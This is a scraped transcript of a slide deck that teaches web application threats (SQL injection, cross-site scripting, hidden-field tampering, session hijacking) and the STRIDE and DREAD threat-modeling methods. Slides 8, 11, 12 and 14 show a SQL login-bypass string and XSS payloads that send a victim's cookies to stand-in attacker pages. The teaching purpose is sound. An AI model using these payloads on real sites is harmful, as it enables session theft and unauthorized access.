Presentation is loading. Please wait.

Presentation is loading. Please wait.

Threats and Threat Modeling

Similar presentations


Presentation on theme: "Threats and Threat Modeling"— Presentation transcript:

1 Threats and Threat Modeling
二○一七年四月十三日 Threats and Threat Modeling Murat Gökşin Bakır Microsoft Regional Director Yage Ltd © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2 Session Agenda Types of threats Threats against the application
二○一七年四月十三日 Session Agenda Types of threats Threats against the application SQL injection Cross-site scripting Input tampering Session hijacking More Threat modeling © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

3 Types of Threats Spoofed packets, etc.
二○一七年四月十三日 Types of Threats Network Host Application Threats against the network Spoofed packets, etc. Threats against the host Buffer overflows, illicit paths, etc. Threats against the application SQL injection, XSS, input tampering, etc. © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

4 Threats Against the Network
二○一七年四月十三日 Threats Against the Network Threat Examples Information gathering Port scanning Using trace routing to detect network topologies Using broadcast requests to enumerate subnet hosts Eavesdropping Using packet sniffers to steal passwords Denial of service (DoS) SYN floods ICMP echo request floods Malformed packets Spoofing Packets with spoofed source addresses frame=true#c _004 i © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

5 Threats Against the Host
二○一七年四月十三日 Threats Against the Host Threat Examples Arbitrary code execution Buffer overflows in ISAPI DLLs (e.g., MS01-033) Directory traversal attacks (MS00-078) File disclosure Malformed HTR requests (MS01-031) Virtualized UNC share vulnerability (MS00-019) Denial of service (DoS) Malformed SMTP requests (MS02-012) Malformed WebDAV requests (MS01-016) Malformed URLs (MS01-012) Brute-force file uploads Unauthorized access Resources with insufficiently restrictive ACLs Spoofing with stolen login credentials Exploitation of open ports and protocols Using NetBIOS and SMB to enumerate hosts Connecting remotely to SQL Server frame=true#c _004 i © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

6 Threats Against the Application
二○一七年四月十三日 Threats Against the Application Threat Examples SQL injection Including a DROP TABLE command in text typed into an input field Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections Session hijacking Using a stolen session ID cookie to access someone else's session state Identity spoofing Using a stolen forms authentication cookie to pose as another user Information disclosure Allowing client to see a stack trace when an unhandled exception occurs frame=true#c _004 i © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

7 二○一七年四月十三日 SQL Injection Exploits applications that use external input in database commands Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter used to generate SQL commands Submit input that modifies the commands Compromise, corrupt, and destroy data © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8 How SQL Injection Works
二○一七年四月十三日 How SQL Injection Works Model Query SELECT COUNT (*) FROM Users WHERE UserName=‘Jeff’ AND Password=‘imbatman’ Malicious Query SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ "or 1=1" matches every record in the table "--" comments out the remainder of the query © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

9 SQL Injection 二○一七年四月十三日 See demo script Demo2-1.doc
© Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

10 Cross-Site Scripting (XSS)
二○一七年四月十三日 Cross-Site Scripting (XSS) Exploits applications that echo raw, unfiltered input to Web pages Input from <form> fields Input from query strings The technique: Find a <form> field or query string parameter whose value is echoed to the Web page Enter malicious script and get an unwary user to navigate to the infected page Steal cookies, deface and disable sites © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

11 How Cross-Site Scripting Works
二○一七年四月十三日 How Cross-Site Scripting Works URL of the site targeted by the attack <a href="http://…/Search.aspx? Search=<script language='javascript'> document.location.replace ('http://localhost/EvilPage.aspx? Cookie=‘ + document.cookie); </script>">…</a> Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. >… Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string. © 2003-2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.", "width": "800" }

12 XSS – How it Works Hello, <% =Request.QueryString(“name”) %>
If Request.Form(“cookie”) <> “” Then data = Request.Form(“cookie”) ‘ Do whatever I want with the cookie End If Response.Redirect <FORM action=http://www.b.com/gather.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> The Bad URL The Bad URL.", "width": "800" }

13 Cross-Site Scripting 二○一七年四月十三日 See demo script Demo2-2.doc
© Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

14 Cross-Site Scripting Attacks Based on <form> Tags (2)
二○一七年四月十三日 <a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> > here </a> © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. > here. © 2003-2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.", "width": "800" }

15 Hidden-Field Tampering
二○一七年四月十三日 Hidden-Field Tampering HTTP is a stateless protocol No built-in way to persist data from one request to the next People are stateful beings Want data persisted between requests Shopping carts, user preferences, etc. Web developers sometimes use hidden fields to persist data between requests Hidden fields are not really hidden! © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

16 How HF Tampering Works Page contains this…
二○一七年四月十三日 How HF Tampering Works type="hidden" prevents the field from being seen on the page but not in View Source Page contains this… <input type=“hidden” name="price" value="$10,000"> Postback data should contain this… price="$10,000" Instead it contains this… price="$1" © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

17 Session Hijacking Web applications use sessions to store state
二○一七年四月十三日 Session Hijacking Web applications use sessions to store state Sessions are private to individual users Sessions can be compromised Threat Risk Factor Theft and replay of session ID cookies High* Links to sites that use cookieless session state Medium* Predictable session IDs Low* Remote connection to state server service Medium Remote connection to state server database Eavesdropping on state server connection * Shorter session time-outs mitigate the risk by reducing the attack window © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

18 Identity Spoofing Security depends on authentication
二○一七年四月十三日 Identity Spoofing Security depends on authentication If authentication can be compromised, security goes out the window Authentication can be compromised Threat Risk Factor Theft of Windows authentication credentials High Theft of forms authentication credentials Theft and replay of authentication cookies Medium* Dictionary attacks and password guessing * Depends on the time-out values assigned to authentication cookies © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

19 Information Disclosure
二○一七年四月十三日 Information Disclosure Which is the better error message? © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

20 Information Disclosure
二○一七年四月十三日 Information Disclosure See demo script Demo2-3.doc © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

21 二○一七年四月十三日 Threat Modeling Structured approach to identifying, quantifying, and addressing threats Essential part of development process Just like specing and designing Just like coding and testing One technique presented here There are others (e.g., OCTAVE) i © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

22 The Threat Modeling Process
二○一七年四月十三日 The Threat Modeling Process 1 Identify assets 2 Document architecture 3 Decompose application 4 Identify threats 5 Document threats 6 Rate threats © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

23 Identifying Assets 1 What is it that you want to protect?
Private data (e.g., customer list) Proprietary data (e.g., intellectual property) Potentially injurious data (e.g., credit card numbers, decryption keys) These also count as "assets" Integrity of back-end databases Integrity of the Web pages (no defacement) Integrity of other machines on the network Availability of the application

24 Documenting Architecture
2 Define what the app does and how it's used Users view pages with catalog items Users perform searches for catalog items Users add items to shopping carts Users check out Diagram the application Show subsystems Show data flow List assets

25 Example Asset #1 Asset #2 Asset #3 Web Server Database Server IIS
二○一七年四月十三日 Example Asset #1 Asset #2 Asset #3 Web Server Database Server Firewall IIS ASP.NET Login Bob Alice Main Bill State Asset #4 Asset #5 Asset #6 © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

26 Decomposing the App 3 Refine the architecture diagram
Show authentication mechanisms Show authorization mechanisms Show technologies (e.g., DPAPI) Diagram trust boundaries Identify entry points Begin to think like an attacker Where are my vulnerabilities? What am I going to do about them?

27 Windows Authentication
二○一七年四月十三日 Example Forms Authentication URL Authorization Web Server Database Server Trust Firewall Bob IIS ASP.NET Login Alice Main Bill State DPAPI Windows Authentication © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

28 Identifying Threats 4 Method #1: Threat lists Method #2: STRIDE
二○一七年四月十三日 Identifying Threats 4 Method #1: Threat lists Start with laundry list of possible threats Identify the threats that apply to your app Method #2: STRIDE Categorized list of threat types Identify threats by type/category Optionally draw threat trees Root nodes represent attacker's goals Trees help identify threat conditions © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

29 STRIDE Spoofing S Tampering T Repudiation R Information disclosure I
Can an attacker gain access using a false identity? Tampering T Can an attacker modify data as it flows through the application? Repudiation R If an attacker denies an exploit, can you prove him or her wrong? Information disclosure I Can an attacker gain access to private or potentially injurious data? Denial of service D Can an attacker crash or reduce the availiability of the system? Elevation of privilege E Can an attacker assume the identity of a privileged user?

30 Threat Trees OR AND AND Theft of Auth Cookies
二○一七年四月十三日 Threat Trees Theft of Auth Cookies Obtain auth cookie to spoof identity OR AND AND Unencrypted Connection Eavesdropping Cross-Site Scripting XSS Vulnerability Cookies travel over unencrypted HTTP Attacker uses sniffer to monitor HTTP traffic Attacker possesses means and knowledge Application is vulnerable to XSS attacks © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

31 Documenting Threats 5 Document threats using a template
二○一七年四月十三日 Documenting Threats 5 Document threats using a template Theft of Auth Cookies by Eavesdropping on Connection Threat target Connections between browsers and Web server Risk Attack techniques Attacker uses sniffer to monitor traffic Countermeasures Use SSL/TLS to encrypt traffic Theft of Auth Cookies via Cross-Site Scripting Threat target Vulnerable application code Risk Attack techniques Attacker sends with malicious link to users Countermeasures Validate input; HTML-encode output © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

32 Rating Threats 6 Simple model DREAD model
二○一七年四月十三日 Rating Threats 6 Simple model DREAD model Greater granularization of threat potential Rates (prioritizes) each threat on scale of 1-15 Developed and widely used by Microsoft Risk = Probability * Damage Potential 1-10 Scale 1 = Least probable 10 = Most probable 1-10 Scale 1 = Least damage 10 = Most damage © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

33 DREAD Damage potential D Reproducibility R Exploitability E
What are the consequences of a successful exploit? R Reproducibility Would an exploit work every time or only under certain circumstances? E Exploitability How skilled must an attacker be to exploit the vulnerability? A Affected users How many users would be affected by a successful exploit? D Discoverability How likely is it that an attacker will know the vulnerability exists?

34 DREAD, Cont. High (3) Medium (2) Low (1) Damage potential
二○一七年四月十三日 DREAD, Cont. High (3) Medium (2) Low (1) Damage potential Attacker can retrieve extremely sensitive data and corrupt or destroy data Attacker can retrieve sensitive data but do little else Attacker can only retrieve data that has little or no potential for harm Reproduc-ability Works every time; does not require a timing window Timing-dependent; works only within a time window Rarely works Exploitabilty Bart Simpson could do it Attacker must be somewhat knowledgeable and skilled Attacker must be VERY knowledgeable and skilled Affected users Most or all users Some users Few if any users Discoverabilty Attacker can easily discover the vulnerability Attacker might discover the vulnerability Attacker will have to dig to discover the vulnerability © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

35 Example Threat D R E A Sum Prioritized Risks
二○一七年四月十三日 Example Threat D R E A Sum Auth cookie theft (eavesdropping) 3 2 13 Auth cookie theft (XSS) 12 Potential for damage is high (spoofed identities, etc.) Cookie can be stolen any time, but is only useful until expired Anybody can run a packet sniffer; XSS attacks require moderate skill Prioritized Risks All users could be affected, but in reality most won't click malicious links Easy to discover: just type a <script> block into a field © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

36 Additional Resources Sanctum AppScan Developer Edition (DE)
二○一七年四月十三日 Additional Resources Sanctum AppScan Developer Edition (DE) Automated unit testing tool that enables rapid development of Secure, Quality Web applications Integrates directly into Visual Studio .NET Real-time scanning of potential vulnerabilities Comprehensive defect analysis of any ASP.NET site For more product information For a free product trial © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

37 Microsoft Developer Network
Patterns and Practices Guides

38 SafeApps™ Secure Code Assurance (SCA) engine
Replaces a manual security code expert code reviewer in a box. Detects the programming errors that lead to security vulnerabilities. Assists in remediating the errors. Detects programming errors that lead to viruses and worms Prioritizes risk of each error from severe error to warning. Optimizes programmer’s time. Guides the programmer to fix the source of error. Most programmers don’t know how to fix security errors. Target user Developer, QA Engineer, Security Engineer Development teams that use SafeApps can drastically reduce the number of vulnerabilities in their software.

39 Resources/Next Steps NGSCB is part of the Longhorn SDK Ask your hardware and software vendors what NGSCB-enabled components they will provide Visit our site and read the white papers and specs Send questions to our Q&A alias Sign up for updates Subscribe to the NGSCB information newsletter for ongoing updates. Send blank to:

40 Purchase and review at: http://www.asp.net/whidbey
ASP.NET Whidbey Book Now available for PDC bits 13 Chapters, 470 Pages Topics Covered Introduction, Tools & Architecture, Data Source Controls and Data Binding, GridView & DetailsView Controls, Master Pages & Navigation, Security, Personalization & Themes, Web Parts, Mobile Device Support, SQL Cache Invalidation, Precompilation, Confuguration & Administration and more. Purchase and review at:

41 FxCop

42 Integer Arithmetic Vulns
Once rare, now common Sun RPC xdr_array (http://www.securityfocus.com/bid/5356) OpenSSH authentication (http://www.securityfocus.com/bid/5093) Apache Chunked Encoding (http://www.securityfocus.com/bid/5033) Microsoft JScript (http://www.microsoft.com/technet/security/bulletin/MS asp) FreeBSD socket and system calls (http://www.securityfocus.com/bid/5493) Snort TCP Packet Reassembly (http://www.securityfocus.com/bid/7178) Microsoft MIDI Decoder (http://www.microsoft.com/technet/security/bulletin/MS asp) OpenSSL ASN.1 Parsing (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN )

43 © 2003-2004 Microsoft Corporation. All rights reserved.
二○一七年四月十三日 © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. © Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.


Download ppt "Threats and Threat Modeling"

Similar presentations


Ads by Google